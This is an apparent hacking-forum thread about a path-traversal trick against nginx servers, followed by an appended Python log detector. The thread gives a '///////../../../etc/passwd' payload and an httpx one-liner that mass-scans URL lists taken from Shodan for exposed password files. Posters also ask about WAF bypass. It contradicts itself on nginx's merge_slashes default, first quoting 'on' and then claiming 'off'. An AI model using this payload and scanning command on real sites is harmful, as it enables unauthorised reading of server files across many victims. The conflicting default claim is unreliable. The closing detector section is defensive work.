
Remote Nginx Merge slashes Path traversal

0x0021h

Payload: GET ///////../../../etc/passwd

 
A vulnerability in the remote Nginx server could cause the server to merge "//" (slash slash) together, turning what should have protected the website from a directory traversal vulnerability into a vulnerable server.

http://NGINX.org/en/docs/http/ngx_http_core_module.html#merge_slashes
Enables or disables compression of two or more adjacent slashes in a URI into a single slash.

Code:
Syntax: merge_slashes on | off;
Default: merge_slashes on;
Context: http, server

When the merge_slashes configuration is turned on, using multiple slashes '///' did not allow us to exploit that vulnerability successfully.
Any requirements for this vulnerability to work?
 
httpx -l url.txt -path "///////../../../../../../etc/passwd" -status-code -mc 200 -ms 'root:'

 
WAF, maybe any bypass method? And one more thing, that url.txt: where do you guys get website URLs? Like from Shodan or any other source, or just random?
 
Get it from Shodan or other cyberspace tools.
 
It should work on all the nginx versions up to the latest builds as this is a misconfiguration issue.
However, by default, the value is set to 'off', so it will work only in specific cases.
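As an added example that is not part of the thread, a small Python detector that runs over constructed access-log lines (the traversal request reuses the payload posted above): it percent-decodes each request path, reports '..' segments and runs of adjacent slashes on the raw path, and notes when merge_slashes would have erased the repeated-slash indicator, so matching only on the normalised path loses it.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (nginx "combined"-style format); the
# traversal request reuses the payload discussed in the thread.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Jan/2022:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.7 - - [08/Jan/2022:10:01:09 +0000] "GET ///////../../../etc/passwd HTTP/1.1" 200 1043
203.0.113.9 - - [08/Jan/2022:10:02:15 +0000] "GET /static//css/site.css HTTP/1.1" 200 2211
203.0.113.9 - - [08/Jan/2022:10:02:30 +0000] "GET /files/..%2f..%2fetc/passwd HTTP/1.1" 404 153
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def merge_slashes(path: str) -> str:
    """Collapse runs of adjacent '/' into one, the operation merge_slashes on performs."""
    return re.sub(r"/{2,}", "/", path)

def traversal_indicators(raw_path: str) -> set:
    """Indicators present in a request path, evaluated on its raw, pre-merge form.

    The path is percent-decoded first so '..%2f' is treated like '../'; the
    query string is dropped because only the path is relevant here.
    """
    path = unquote(raw_path.split("?", 1)[0])
    found = set()
    if re.search(r"/{2,}", path):
        found.add("repeated_slashes")
    if ".." in path.split("/"):
        found.add("dot_dot")
    # Once slashes are merged the repeated-slash indicator is gone: a detector
    # fed only the normalised path would see a plain '/../../../etc/passwd'.
    if "dot_dot" in found and merge_slashes(path) != path:
        found.add("changed_by_merge")
    return found

def scan_log(log_text: str) -> list:
    """Return (status, raw_path, indicators) for each request with a '..' segment."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m is None:
            continue
        ind = traversal_indicators(m.group("path"))
        if "dot_dot" in ind:
            hits.append((int(m.group("status")), m.group("path"), ind))
    return hits
```

A 200 status on a flagged path is the line to triage first; a 404 shows the attempt was made but did not resolve.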
 

